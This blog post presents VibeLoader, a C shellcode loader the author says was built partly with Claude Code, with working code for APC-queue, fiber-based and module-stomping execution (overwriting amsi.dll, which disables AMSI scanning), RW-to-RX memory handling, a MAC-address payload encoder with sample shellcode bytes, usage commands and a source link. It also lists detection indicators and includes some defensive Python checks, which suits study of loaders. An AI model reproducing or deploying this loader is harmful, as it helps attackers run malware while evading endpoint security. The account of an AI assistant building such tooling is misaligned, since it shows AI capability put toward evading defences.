VibeLoader: Loading for Fun and No Profit

Shellcode loaders are one of the most fundamental pieces of offensive tooling. Every implant, every stager, every post-exploitation payload needs a way to get into memory and execute. The problem is, EDR vendors know this — and the classic VirtualAlloc + memcpy + CreateThread pattern is one of the most heavily monitored sequences in modern endpoint security.

VibeLoader is a custom shellcode loader I vibe coded with Claude Code, plus some manual development, to explore practical evasion techniques and test different execution methods. It’s written in pure C with no external dependencies beyond the Windows API, and it implements three distinct execution methods with increasing levels of stealth. Some choices prioritize OPSEC, others are more exploratory; I’ll call out which is which as we go.

This post walks through the design, the execution techniques, and the trade-offs behind each decision.

Design Principles

These are the concepts I wanted to test and implement. Not all of them are fully hardened; some are starting points that could be taken further.

Never use RWX memory — Allocate as RW, copy shellcode, then flip to RX. RWX pages are anomalous and a dead giveaway to memory scanners. This is a fundamental OPSEC principle worth building into any loader from the start.
Avoid CreateThread / CreateRemoteThread — These are among the most monitored APIs in any EDR. I wanted to explore alternative execution methods and understand why they’re harder to detect.
Clean up — Zero memory before freeing. This prevents shellcode from being recovered in a memory dump post-execution.
Minimize file I/O footprint — Use memory-mapped I/O instead of standard file reads where possible. This was an experiment to see how different I/O methods generate different telemetry.
Support payload obfuscation — Raw shellcode on disk is signature bait. VibeLoader uses MAC address encoding as an exploratory technique, but encoding is not encryption — the bytes are reformatted, not protected. In practice, AES or XOR encryption with environment-keyed decryption at runtime is the OPSEC-safe choice.

Execution Methods

VibeLoader supports three execution techniques, selectable at runtime. Each trades simplicity for stealth.

Method 1: APC Queue

The default method. Instead of creating a new thread, we queue an Asynchronous Procedure Call to the current thread and enter an alertable wait state. When the thread becomes alertable, Windows processes the APC — which points to our shellcode.

// Duplicate current thread handle
DuplicateHandle(
    GetCurrentProcess(),
    GetCurrentThread(),
    GetCurrentProcess(),
    &hThread,
    0, FALSE,
    DUPLICATE_SAME_ACCESS
);

// Queue shellcode as APC callback
QueueUserAPC((PAPCFUNC)execMemory, hThread, 0);

// Enter alertable wait — APC fires here
SleepEx(0, TRUE);

Why it works: No new threads are created. The shellcode runs in the context of the existing thread via the APC mechanism, which is a legitimate Windows feature designed for asynchronous callbacks. EDR products that focus on thread creation events won’t see this.

Trade-off: EDR can still monitor QueueUserAPC calls and alertable sleep patterns. This is medium evasion — effective against basic detection but not against mature EDR products that hook APC functions.

Method 2: Fiber-Based Execution

Fibers are user-mode cooperative threading primitives. They’re scheduled entirely in user space — the kernel has no visibility into fiber switches. This makes them an excellent execution vehicle for shellcode.

// Convert main thread to fiber
LPVOID originalFiber = ConvertThreadToFiber(NULL);

// Setup fiber context
FIBER_CONTEXT fiberCtx = {0};
fiberCtx.shellcodeAddress = execMemory;
fiberCtx.originalFiber = originalFiber;
fiberCtx.executionComplete = FALSE;

// Create shellcode fiber
LPVOID shellcodeFiber = CreateFiber(0, ShellcodeFiberProc, &fiberCtx);

// Switch execution to shellcode
SwitchToFiber(shellcodeFiber);

// Cleanup after execution returns
DeleteFiber(shellcodeFiber);
ConvertFiberToThread();

The fiber callback is straightforward — execute the shellcode, mark completion, switch back:

VOID CALLBACK ShellcodeFiberProc(LPVOID lpParameter) {
    PFIBER_CONTEXT ctx = (PFIBER_CONTEXT)lpParameter;

    ((void(*)())ctx->shellcodeAddress)();

    ctx->executionComplete = TRUE;
    SwitchToFiber(ctx->originalFiber);
}

Why it works: Fiber scheduling happens entirely in user mode. There are no kernel transitions during SwitchToFiber, which means kernel-level thread monitoring is blind to the execution. Most EDR products don’t instrument fiber APIs because they’re rarely used in legitimate software — which is exactly what makes them useful for us.

Trade-off: Some next-gen EDR products have started hooking ConvertThreadToFiber and CreateFiber. The technique is gaining awareness, but it’s still less monitored than thread-based execution.

Method 3: Module Stomping

The highest evasion method. Instead of allocating new memory, we load a legitimate DLL into the process and overwrite its executable section. The shellcode runs from the DLL’s .text section, so the call stack points to a signed, trusted module.

const char* targetDll = "amsi.dll";

// Load the target DLL
HMODULE hModule = LoadLibraryA(targetDll);

// Parse PE headers to find .text section
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);
PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);

// Find executable section
for (int i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++) {
    if (sectionHeader->Characteristics & IMAGE_SCN_MEM_EXECUTE) {
        targetAddress = (LPVOID)((BYTE*)hModule + sectionHeader->VirtualAddress);
        targetSize = sectionHeader->Misc.VirtualSize;
        break;
    }
    sectionHeader++;
}

// Flip to RW, write shellcode, restore to RX
VirtualProtect(targetAddress, size, PAGE_READWRITE, &oldProtect);
memcpy(targetAddress, shellcode, size);
VirtualProtect(targetAddress, size, PAGE_EXECUTE_READ, &temp);

// Execute from the DLL's .text section
((void(*)())targetAddress)();

Why it works: When the shellcode executes, the instruction pointer is inside amsi.dll’s .text section. Any call stack analysis shows execution originating from a legitimate Microsoft DLL, not from a suspicious VirtualAlloc’d memory region. This bypasses code origin validation and many behavioral detection rules.

Trade-off: Module integrity monitoring can catch this — some EDR products compare loaded module sections against their on-disk counterparts. Also, the target DLL’s original functionality is destroyed for the lifetime of the process.
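
The integrity check described in this trade-off can be sketched in Python. This version parses a PE image read from disk, extracts each executable section, and compares its hash against bytes captured from memory. The helper names (`executable_sections`, `section_matches_disk`) are hypothetical, and the comparison assumes the captured bytes start at the section's virtual address and that no relocations or legitimate patches touch the section, which real tools have to account for.

```python
import hashlib
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000  # section characteristic flag from the PE format


def executable_sections(pe_bytes):
    """Yield (name, virtual_address, raw_data) for each executable section."""
    if pe_bytes[:2] != b'MZ':
        raise ValueError('missing MZ signature')
    (e_lfanew,) = struct.unpack_from('<I', pe_bytes, 0x3C)
    if pe_bytes[e_lfanew:e_lfanew + 4] != b'PE\x00\x00':
        raise ValueError('missing PE signature')
    (num_sections,) = struct.unpack_from('<H', pe_bytes, e_lfanew + 6)
    (opt_size,) = struct.unpack_from('<H', pe_bytes, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size  # section table follows the optional header
    for i in range(num_sections):
        off = table + 40 * i  # each section header is 40 bytes
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from(
            '<8sIIII', pe_bytes, off)
        (characteristics,) = struct.unpack_from('<I', pe_bytes, off + 36)
        if characteristics & IMAGE_SCN_MEM_EXECUTE:
            length = min(vsize, raw_size) if vsize else raw_size
            data = pe_bytes[raw_ptr:raw_ptr + length]
            yield name.rstrip(b'\x00').decode('ascii', 'replace'), vaddr, data


def section_matches_disk(disk_data, memory_data):
    """Return True when the in-memory bytes hash the same as the on-disk bytes."""
    mem = memory_data[:len(disk_data)]
    return hashlib.sha256(mem).digest() == hashlib.sha256(disk_data).digest()
```

A stomped section fails this comparison as soon as a single byte in the hashed range differs, which is why overwriting a loaded module trades one indicator for another.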

The choice of amsi.dll is deliberate — it’s the Antimalware Scan Interface, and overwriting it has the side effect of neutralizing AMSI-based script scanning in the process.

Memory Management

Every execution method follows the same memory protection lifecycle:

// Stage 1: Allocate RW memory
LPVOID mem = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// Stage 2: Copy shellcode
memcpy(mem, shellcode, size);

// Stage 3: Flip to RX (NEVER RWX)
VirtualProtect(mem, size, PAGE_EXECUTE_READ, &oldProtect);

The RW → RX pattern is critical. RWX (read-write-execute) pages are uncommon in legitimate software outside of JIT compilers and are one of the first things memory scanners flag. By splitting the allocation into two protection stages, we avoid this indicator entirely.
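
To make the distinction concrete from the scanner's side, here is a toy Python classifier for protection changes. The constants are the documented Windows page-protection values; the function `classify_transition` and its labels are hypothetical and far simpler than what a real product does.

```python
# Documented Windows memory protection constants
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40

WRITABLE = {PAGE_READWRITE, PAGE_EXECUTE_READWRITE}
EXECUTABLE = {PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE}


def classify_transition(old_protect, new_protect):
    """Label a protection change (hypothetical labels, for illustration only)."""
    if new_protect == PAGE_EXECUTE_READWRITE:
        return 'rwx'  # writable and executable at the same time
    if old_protect in WRITABLE and new_protect in EXECUTABLE:
        return 'write-then-execute'  # the two-stage RW -> RX pattern
    return 'benign'


print(classify_transition(PAGE_READWRITE, PAGE_EXECUTE_READ))
```

Both cases are visible to this kind of check. The two-stage pattern removes the RWX indicator, but the protection change itself can still be observed.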

On cleanup, memory is zeroed before being freed:

void CleanupExecutableMemory(LPVOID execMemory, SIZE_T size) {
    if (execMemory) {
        SecureZeroMemory(execMemory, size);
        VirtualFree(execMemory, 0, MEM_RELEASE);
    }
}

SecureZeroMemory prevents the compiler from optimizing away the zeroing operation, so the shellcode bytes are not left in the freed region for a later memory dump to recover.

Payload Obfuscation: MAC Address Encoding

Raw shellcode sitting on disk is trivially signature-able. VibeLoader supports loading payloads encoded as MAC addresses — each MAC address stores 6 bytes of shellcode data. This was more of an exploratory exercise than an OPSEC-first decision — I wanted to test out the MAC obfuscation technique and see how it works in practice.

The encoding is done with a Python helper:

def encode_to_mac_addresses(data, separator=':'):
    mac_addresses = []
    for i in range(0, len(data), 6):
        chunk = data[i:i+6]
        if len(chunk) < 6:
            chunk = chunk + b'\x00' * (6 - len(chunk))
        mac_addr = separator.join(f'{b:02X}' for b in chunk)
        mac_addresses.append(mac_addr)
    return mac_addresses

# Encode a payload
python3 mac_encode.py payload.bin macs.txt

# Load with VibeLoader
loader.exe -mac macs.txt -m 2

The encoded file looks like network configuration data:

FC:48:81:E4:F0:FF
FF:FF:E8:D0:00:00
00:41:51:41:50:52
51:56:48:31:D2:65

The loader parses each line back into 6 bytes and reconstructs the original shellcode in memory. The encoding breaks up the binary pattern on disk, but it’s important to note — encoding is not encryption. The shellcode bytes are still there in plaintext, just reformatted. Any analyst who recognizes the MAC address pattern can trivially decode it back to the original payload.
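
To show how little protection the encoding offers, here is a minimal Python sketch of the reverse step. It is not the loader's C parser; the function name `decode_mac_addresses` is my own, and it assumes one address per line with the same separator the encoder uses. Because the encoder pads the final chunk with zero bytes, the decoded output can be up to five bytes longer than the original payload.

```python
def decode_mac_addresses(lines, separator=':'):
    """Rebuild bytes from MAC-formatted lines (hypothetical helper)."""
    data = bytearray()
    for line in lines:
        line = line.strip()
        if not line:
            continue  # tolerate blank lines
        parts = line.split(separator)
        if len(parts) != 6:
            raise ValueError(f'expected 6 octets, got {len(parts)}: {line!r}')
        data.extend(int(part, 16) for part in parts)  # each octet is two hex digits
    return bytes(data)


sample = ['FC:48:81:E4:F0:FF', 'FF:FF:E8:D0:00:00']
decoded = decode_mac_addresses(sample)
print(decoded.hex())
```

No key or secret is involved at any point, which is the practical difference between this and encryption.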

For a real engagement, the more OPSEC-safe approach is runtime encryption — AES or XOR with a key derived at execution time (environment-keying, remote key fetch, etc.). The payload is unreadable on disk and only decrypted in memory right before execution. MAC encoding was a fun technique to implement and test, but encryption is what you’d reach for when it matters.

File I/O: Memory-Mapped Loading

For direct binary payloads, VibeLoader uses memory-mapped I/O instead of standard ReadFile calls:

HANDLE hFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hMapping = CreateFileMappingA(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
LPVOID mappedView = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);

// Copy from mapped view
memcpy(buffer, mappedView, fileSize);

UnmapViewOfFile(mappedView);

// Release the mapping and file handles
CloseHandle(hMapping);
CloseHandle(hFile);

Memory-mapped I/O flows through the Windows memory management subsystem rather than the file I/O path. This generates different telemetry than a ReadFile call and can bypass file activity monitoring that only hooks the standard read APIs. The CreateFileA call that opens the file is still visible.
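
The same read-through-a-mapping idea can be shown in a few lines of Python with the standard `mmap` module. This is an illustration of the I/O pattern only, not the loader's code; `read_via_mapping` is a hypothetical name, and empty files are handled separately because `mmap` refuses to map them.

```python
import mmap
import os


def read_via_mapping(path):
    """Return a file's contents by copying them out of a read-only mapping."""
    with open(path, 'rb') as f:
        if os.fstat(f.fileno()).st_size == 0:
            return b''  # mmap raises ValueError for empty files
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as view:
            return view[:]  # slicing copies the bytes out of the mapped view
```

The file is still opened by name before it is mapped, so only the read step changes shape.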

Usage

# Basic: load and execute with default APC method
loader.exe payload.bin

# Fiber-based execution
loader.exe -m 2 payload.bin

# Module stomping with verbose output
loader.exe -m 3 -v payload.bin

# MAC-encoded payload with fiber execution
loader.exe -mac macs.txt -m 2

# Pause before execution (useful for attaching debugger)
loader.exe -p -v payload.bin

# Skip cleanup (keep shellcode in memory)
loader.exe -n payload.bin

Building

VibeLoader compiles with MinGW for cross-compilation from Linux or with MSVC on Windows:

# Linux (MinGW cross-compilation)
make

# Windows (Visual Studio x64 Native Tools Command Prompt)
build.bat

The MinGW build links against ntdll, winhttp, and cabinet for NT API access and potential future staging capabilities.

Detection Considerations

No loader is undetectable. Here’s what defenders can look for:

Memory protection transitions — The RW → RX pattern, while better than RWX, is still detectable by EDR products that monitor VirtualProtect calls on newly allocated memory.
APC + alertable sleep — The QueueUserAPC followed by SleepEx(0, TRUE) pattern is a known indicator, though less signatured than thread creation.
Fiber API usage — ConvertThreadToFiber and CreateFiber are uncommon in legitimate software, which makes them anomalous.
Module section modification — Any VirtualProtect call on a loaded DLL’s .text section is highly suspicious. Module integrity checks will catch this.
MAC address file format — The encoding format is signature-able if analyzed as structured text.
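
As a sketch of how the last indicator could be checked, the following Python function flags text whose non-empty lines are almost all MAC-formatted. The name `looks_mac_encoded`, the 0.9 ratio, and the minimum line count are illustrative assumptions, not values taken from any product.

```python
import re

# Six two-digit hex octets separated by ':' or '-'
MAC_LINE = re.compile(r'^[0-9A-Fa-f]{2}([:-][0-9A-Fa-f]{2}){5}$')


def looks_mac_encoded(text, min_lines=16, min_ratio=0.9):
    """Heuristic: True when most non-empty lines are MAC addresses."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < min_lines:
        return False  # too short to judge; a real config may list a few MACs
    hits = sum(1 for ln in lines if MAC_LINE.match(ln))
    return hits / len(lines) >= min_ratio
```

A file with dozens of consecutive MAC addresses and nothing else is unusual for real network configuration, which is what makes the format easy to flag.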

The value isn’t in being undetectable — it’s in understanding the detection surface and making informed decisions about which trade-offs to accept for a given engagement.

What’s Next

VibeLoader is a foundation. There’s plenty of room to extend it:

Anti-analysis checks — Pre-execution environment validation to detect sandboxes, debuggers, and VMs before running. Layer hardware checks (CPU cores, RAM, uptime), process scanning for analyst tools, and user interaction validation. I covered these techniques in the anti-analysis section of the Modern C2 Usage post.
Indirect syscalls — Replace VirtualAlloc/VirtualProtect with indirect NT syscalls to bypass user-mode hooks
Encrypted payloads — AES/XOR encryption with key derivation at runtime instead of static encoding
Remote staging — Pull payloads over HTTPS instead of reading from disk
Sleep obfuscation — Encrypt the shellcode in memory between callbacks using Ekko/Foliage techniques
PPID spoofing — Spawn sacrificial processes with spoofed parent PIDs for injection targets

Each of these deserves its own deep dive, which I’ll cover in future posts. For now, the source is available at github.com/zachmarmolejo/VibeLoader.